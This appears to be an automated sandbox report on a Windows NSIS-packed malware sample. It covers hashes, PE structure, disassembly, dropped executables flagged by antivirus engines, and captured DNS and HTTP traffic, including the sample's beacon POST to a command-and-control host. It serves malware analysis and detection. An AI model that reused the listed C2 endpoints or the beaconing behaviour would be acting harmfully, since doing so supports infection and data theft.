          Preview:snkz.89.187.171.144.pe.suckmycocklameavindustry.in/.1536.1178451968.31320892.3507856880.31061020.*.
          Process:C:\Windows\SysWOW64\svchost.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):157
          Entropy (8bit):4.591261443677953
          Encrypted:false
          SSDEEP:3:EngSc3dxZElO3dcYZLIRqTcTUJVecQVgVvXGOfZJWEA1QWQ7XiodQVeXvWA7dXvq:Egv3dxZEMcILIRqQYJ5QGFXZ/Wn1QrTs
          MD5:3931E58FFFBD0D2CF50ECFB0B0E77ACD
          SHA1:8D38511F7BA590D1F5F6482F83A6CB78F28065C5
          SHA-256:D5923F9CD92811609C2E5F53CB20FFC639A7480B4D5ECBC032A5826F5853DCF5
          SHA-512:EEB6205CA92955C3706215DB8942B2A3C3554BB7D3D6F171C4BDB2A944597609A2A5F7E3EB33E6CF5FA1DC1F155C3AC18CEC22419454AF9568CDD19DAB7D1179
          Malicious:false
          Reputation:low
          Preview:btst.8894309f7f6b8698b45deaaa26bda18e|89.187.171.144|1696132900|1696132900|0|1|0.suckmycocklameavindustry.in/.9728.1178451968.31320892.3507856880.31061020.*.
          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Entropy (8bit):7.67760121359675
          TrID:
          • Win32 Executable (generic) a (10002005/4) 92.16%
          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:Hu25VEa8Dr.exe
          File size:196'227 bytes
          MD5:bc76bd7b332aa8f6aedbb8e11b7ba9b6
          SHA1:c6858031315a50ec87e37966291ec69b64600efb
          SHA256:9535a9bb1ae8f620d7cbd7d9f5c20336b0fd2c78d1a7d892d76e4652dd8b2be7
          SHA512:c74a8a893d0d91ef9423c75c14e701102f01d46b4638d7e3184c95bfd4ff29f9cab71fe5de45e8e201dcdb8df77e952a18e32bfed5014b9c8155c189825f37e9
          SSDEEP:3072:ugXdZt9P6D3XJ3TCM/vosUE2L/TLqtAyD2XXhtksIae31fXJHhKgzyJtdeV:ue34p/vr6yrC2sJe35ZBKg0dW
          TLSH:6B14024364F582BFD6820432D5B92B79D77BCD8D438A7A470B447F21BA318D3C909E8A
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^.........
          Icon Hash:9270c4ccc6741c42
          Entrypoint:0x4030fa
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          DLL Characteristics:TERMINAL_SERVER_AWARE
          Time Stamp:0x4B1AE3CC [Sat Dec 5 22:50:52 2009 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:7fa974366048f9c551ef45714595665e
          Instruction
          sub esp, 00000180h
          push ebx
          push ebp
          push esi
          xor ebx, ebx
          push edi
          mov dword ptr [esp+18h], ebx
          mov dword ptr [esp+10h], 00409160h
          xor esi, esi
          mov byte ptr [esp+14h], 00000020h
          call dword ptr [00407030h]
          push 00008001h
          call dword ptr [004070B0h]
          push ebx
          call dword ptr [0040727Ch]
          push 00000008h
          mov dword ptr [0042EC18h], eax
          call 00007FEEC5176316h
          mov dword ptr [0042EB64h], eax
          push ebx
          lea eax, dword ptr [esp+34h]
          push 00000160h
          push eax
          push ebx
          push 00428F98h
          call dword ptr [00407158h]
          push 00409154h
          push 0042E360h
          call 00007FEEC5175FC9h
          call dword ptr [004070ACh]
          mov edi, 00434000h
          push eax
          push edi
          call 00007FEEC5175FB7h
          push ebx
          call dword ptr [0040710Ch]
          cmp byte ptr [00434000h], 00000022h
          mov dword ptr [0042EB60h], eax
          mov eax, edi
          jne 00007FEEC517372Ch
          mov byte ptr [esp+14h], 00000022h
          mov eax, 00434001h
          push dword ptr [esp+14h]
          push eax
          call 00007FEEC5175AAAh
          push eax
          call dword ptr [0040721Ch]
          mov dword ptr [esp+1Ch], eax
          jmp 00007FEEC5173785h
          cmp cl, 00000020h
          jne 00007FEEC5173728h
          inc eax
          cmp byte ptr [eax], 00000020h
          je 00007FEEC517371Ch
          cmp byte ptr [eax], 00000022h
          mov byte ptr [eax+eax+00h], 00000000h
          Programming Language:
          • [EXP] VC++ 6.0 SP5 build 8804
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x43f8.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x5c4c0x5e00False0.6697140957446809data6.440105549497952IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x70000x129c0x1400False0.43359375data5.046835307909969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x90000x25c580x400False0.5849609375data4.801003752715384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x370000x43f80x4400False0.16670496323529413data2.6375067972964095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_ICON0x372380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.09076763485477178
          RT_ICON0x397e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.14118198874296436
          RT_ICON0x3a8880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3891843971631206
          RT_DIALOG0x3acf00x100dataEnglishUnited States0.5234375
          RT_DIALOG0x3adf00x11cdataEnglishUnited States0.6056338028169014
          RT_DIALOG0x3af100x60dataEnglishUnited States0.7291666666666666
          RT_GROUP_ICON0x3af700x30dataEnglishUnited States0.8541666666666666
          RT_VERSION0x3afa00x184MS Windows COFF Alpha object fileEnglishUnited States0.5463917525773195
          RT_MANIFEST0x3b1280x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States0.5656424581005587
          DLLImport
          KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
          USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
          SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
          ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          147.75.61.38192.168.2.2280491662031515 10/01/23-06:01:37.455932TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049166147.75.61.38192.168.2.22
          TimestampSource PortDest PortSource IPDest IP
          Oct 1, 2023 06:01:37.211152077 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.333363056 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.333457947 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.333792925 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.455874920 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.455931902 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.455969095 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.455986977 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.456039906 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.456289053 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.578176022 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.578208923 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.578372002 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:40.038088083 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.212160110 CEST804916734.29.71.138192.168.2.22
          Oct 1, 2023 06:01:40.212265968 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.212869883 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.386900902 CEST804916734.29.71.138192.168.2.22
          Oct 1, 2023 06:01:40.386976957 CEST804916734.29.71.138192.168.2.22
          Oct 1, 2023 06:01:40.387012005 CEST804916734.29.71.138192.168.2.22
          Oct 1, 2023 06:01:40.387048006 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.387104034 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.404280901 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.619858027 CEST804916734.29.71.138192.168.2.22
          TimestampSource PortDest PortSource IPDest IP
          Oct 1, 2023 06:01:20.029628992 CEST138138192.168.2.22192.168.2.255
          Oct 1, 2023 06:01:37.098201990 CEST5789453192.168.2.228.8.4.4
          Oct 1, 2023 06:01:37.210273027 CEST53578948.8.4.4192.168.2.22
          Oct 1, 2023 06:01:37.456758976 CEST5789553192.168.2.228.8.4.4
          Oct 1, 2023 06:01:37.855343103 CEST5482153192.168.2.228.8.8.8
          Oct 1, 2023 06:01:38.076950073 CEST53578958.8.4.4192.168.2.22
          Oct 1, 2023 06:01:38.080461025 CEST5471953192.168.2.228.8.8.8
          Oct 1, 2023 06:01:38.604868889 CEST53547198.8.8.8192.168.2.22
          Oct 1, 2023 06:01:38.610348940 CEST4988153192.168.2.228.8.8.8
          Oct 1, 2023 06:01:38.857579947 CEST5482153192.168.2.228.8.8.8
          Oct 1, 2023 06:01:39.133213043 CEST53498818.8.8.8192.168.2.22
          Oct 1, 2023 06:01:39.134609938 CEST137137192.168.2.22192.168.2.255
          Oct 1, 2023 06:01:39.871609926 CEST5482153192.168.2.228.8.8.8
          Oct 1, 2023 06:01:39.887109041 CEST137137192.168.2.22192.168.2.255
          Oct 1, 2023 06:01:40.016741037 CEST53548218.8.8.8192.168.2.22
          Oct 1, 2023 06:01:40.026393890 CEST53548218.8.8.8192.168.2.22
          Oct 1, 2023 06:01:40.651536942 CEST137137192.168.2.22192.168.2.255
          Oct 1, 2023 06:01:43.965873003 CEST53548218.8.8.8192.168.2.22
          Oct 1, 2023 06:03:19.729870081 CEST138138192.168.2.22192.168.2.255
          TimestampSource IPDest IPChecksumCodeType
          Oct 1, 2023 06:01:40.026474953 CEST192.168.2.228.8.8.8d024(Port unreachable)Destination Unreachable
          Oct 1, 2023 06:01:43.965990067 CEST192.168.2.228.8.8.8d014(Port unreachable)Destination Unreachable
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Oct 1, 2023 06:01:37.098201990 CEST192.168.2.228.8.4.40x1234Standard query (0)xdqzpbcgrvkj.ruA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:37.456758976 CEST192.168.2.228.8.4.40x1234Standard query (0)anam0rph.suA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:37.855343103 CEST192.168.2.228.8.8.80xb02dStandard query (0)pe.suckmycocklameavindustry.inA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:38.080461025 CEST192.168.2.228.8.8.80x82e1Standard query (0)anam0rph.suA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:38.610348940 CEST192.168.2.228.8.8.80x2610Standard query (0)anam0rph.suA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:38.857579947 CEST192.168.2.228.8.8.80xb02dStandard query (0)pe.suckmycocklameavindustry.inA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:39.871609926 CEST192.168.2.228.8.8.80xb02dStandard query (0)pe.suckmycocklameavindustry.inA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Oct 1, 2023 06:01:37.210273027 CEST8.8.4.4192.168.2.220x1234No error (0)xdqzpbcgrvkj.ru147.75.61.38A (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:37.210273027 CEST8.8.4.4192.168.2.220x1234No error (0)xdqzpbcgrvkj.ru147.75.63.87A (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:38.076950073 CEST8.8.4.4192.168.2.220x1234Server failure (2)anam0rph.sunonenoneA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:38.604868889 CEST8.8.8.8192.168.2.220x82e1Server failure (2)anam0rph.sunonenoneA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:39.133213043 CEST8.8.8.8192.168.2.220x2610Server failure (2)anam0rph.sunonenoneA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:40.016741037 CEST8.8.8.8192.168.2.220xb02dNo error (0)pe.suckmycocklameavindustry.in34.29.71.138A (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:40.026393890 CEST8.8.8.8192.168.2.220xb02dNo error (0)pe.suckmycocklameavindustry.in34.29.71.138A (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:43.965873003 CEST8.8.8.8192.168.2.220xb02dServer failure (2)pe.suckmycocklameavindustry.innonenoneA (IP address)IN (0x0001)false
          • xdqzpbcgrvkj.ru
          • pe.suckmycocklameavindustry.in
          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.2249166147.75.61.3880C:\Windows\SysWOW64\svchost.exe
          TimestampkBytes transferredDirectionData
          Oct 1, 2023 06:01:37.333792925 CEST2OUTPOST /in.php HTTP/1.1
          Host: xdqzpbcgrvkj.ru
          User-Agent: Mozilla/4.0
          Content-Type: application/x-www-form-urlencoded
          Content-Length: 84
          Connection: close
          Oct 1, 2023 06:01:37.455931902 CEST3INHTTP/1.1 200 OK
          Date: Sun, 01 Oct 2023 04:01:37 GMT
          Content-Length: 607
          Content-Type: text/html; charset=utf-8
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
          Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
          Oct 1, 2023 06:01:37.455986977 CEST3OUTData Raw: 75 70 71 63 68 69 34 2b 75 46 54 41 45 2b 4e 6a 6d 49 4b 47 49 77 69 4c 72 48 6f 33 56 74 36 38 54 33 79 71 76 68 51 75 32 54 71 65 74 51 37 38 72 6f 79 37 51 36 62 6f 54 66 44 55 74 59 49 66 74 5a 33 33 4d 78 34 47 4b 67 77 67 39 6d 59 33 71 77
          Data Ascii: upqchi4+uFTAE+NjmIKGIwiLrHo3Vt68T3yqvhQu2TqetQ78roy7Q6boTfDUtYIftZ33Mx4GKgwg9mY3qw==


          Session IDSource IPSource PortDestination IPDestination PortProcess
          1192.168.2.224916734.29.71.13880C:\Windows\SysWOW64\svchost.exe
          TimestampkBytes transferredDirectionData
          Oct 1, 2023 06:01:40.212869883 CEST5OUTGET /dtkdvjezlgdvslgbvqqjiiheaxroigff HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: pe.suckmycocklameavindustry.in
          Connection: Keep-Alive
          Oct 1, 2023 06:01:40.386976957 CEST6INHTTP/1.1 200 OK
          Server: nginx
          Date: Sun, 01 Oct 2023 04:01:40 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: btst=; path=/; domain=.pe.suckmycocklameavindustry.in; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
          Set-Cookie: btst=; path=/; domain=pe.suckmycocklameavindustry.in; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
          Set-Cookie: btst=8894309f7f6b8698b45deaaa26bda18e|89.187.171.144|1696132900|1696132900|0|1|0; path=/; domain=.suckmycocklameavindustry.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
          Set-Cookie: snkz=89.187.171.144; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
          Content-Encoding: gzip
          Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
          Data Ascii: 140


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:06:01:19
          Start date:01/10/2023
          Path:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Imagebase:0x400000
          File size:196'227 bytes
          MD5 hash:BC76BD7B332AA8F6AEDBB8E11B7BA9B6
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:2
          Start time:06:01:19
          Start date:01/10/2023
          Path:C:\Users\user\AppData\Local\Temp\Sahofivizu.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Imagebase:0x400000
          File size:20'480 bytes
          MD5 hash:7FE00CC4EA8429629AC0AC610DB51993
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 57%, ReversingLabs
          • Detection: 61%, Virustotal, Browse
          Reputation:low
          Has exited:true

          Target ID:3
          Start time:06:01:24
          Start date:01/10/2023
          Path:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Imagebase:0x400000
          File size:196'227 bytes
          MD5 hash:BC76BD7B332AA8F6AEDBB8E11B7BA9B6
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:4
          Start time:06:01:24
          Start date:01/10/2023
          Path:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Imagebase:0x400000
          File size:196'227 bytes
          MD5 hash:BC76BD7B332AA8F6AEDBB8E11B7BA9B6
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:5
          Start time:06:01:25
          Start date:01/10/2023
          Path:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
          Imagebase:0x400000
          File size:88'209 bytes
          MD5 hash:B3657BCFE8240BC0985093A0F8682703
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 100%, Joe Sandbox ML
          • Detection: 87%, ReversingLabs
          • Detection: 85%, Virustotal, Browse
          Reputation:low
          Has exited:true

          Target ID:6
          Start time:06:01:26
          Start date:01/10/2023
          Path:C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
          Imagebase:0x400000
          File size:19'968 bytes
          MD5 hash:44902781C1865978B17F396DB51D85E1
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 76%, ReversingLabs
          • Detection: 77%, Virustotal, Browse
          Reputation:low
          Has exited:true

          Target ID:7
          Start time:06:01:31
          Start date:01/10/2023
          Path:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
          Imagebase:0x400000
          File size:88'209 bytes
          MD5 hash:B3657BCFE8240BC0985093A0F8682703
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:8
          Start time:06:01:31
          Start date:01/10/2023
          Path:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
          Imagebase:0x400000
          File size:88'209 bytes
          MD5 hash:B3657BCFE8240BC0985093A0F8682703
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:9
          Start time:06:01:31
          Start date:01/10/2023
          Path:C:\Windows\SysWOW64\svchost.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\syswow64\svchost.exe
          Imagebase:0xcd0000
          File size:20'992 bytes
          MD5 hash:54A47F6B5E09A77E61649109C6A08866
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:12.5%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:22.8%
            Total number of Nodes:1217
            Total number of Limit Nodes:24
            execution_graph 2618 401dc1 2630 4029f6 2618->2630 2621 4029f6 18 API calls 2622 401dd0 2621->2622 2623 4029f6 18 API calls 2622->2623 2624 401dd9 2623->2624 2625 4029f6 18 API calls 2624->2625 2626 401de2 2625->2626 2636 401423 2626->2636 2629 401e16 2631 402a02 2630->2631 2639 405a2e 2631->2639 2634 401dc7 2634->2621 2679 404daa 2636->2679 2651 405a3b 2639->2651 2640 405c55 2641 402a23 2640->2641 2674 405a0c lstrcpynA 2640->2674 2641->2634 2658 405c6e 2641->2658 2643 405ad3 GetVersion 2650 405ae0 2643->2650 2644 405c2c lstrlenA 2644->2651 2647 405a2e 10 API calls 2647->2644 2649 405b4b GetSystemDirectoryA 2649->2650 2650->2649 2650->2651 2652 405b5e GetWindowsDirectoryA 2650->2652 2654 405a2e 10 API calls 2650->2654 2655 405bd5 lstrcatA 2650->2655 2656 405b92 SHGetSpecialFolderLocation 2650->2656 2667 4058f3 RegOpenKeyExA 2650->2667 2651->2640 2651->2643 2651->2644 2651->2647 2653 405c6e 5 API calls 2651->2653 2672 40596a wsprintfA 2651->2672 2673 405a0c lstrcpynA 2651->2673 2652->2650 2653->2651 2654->2650 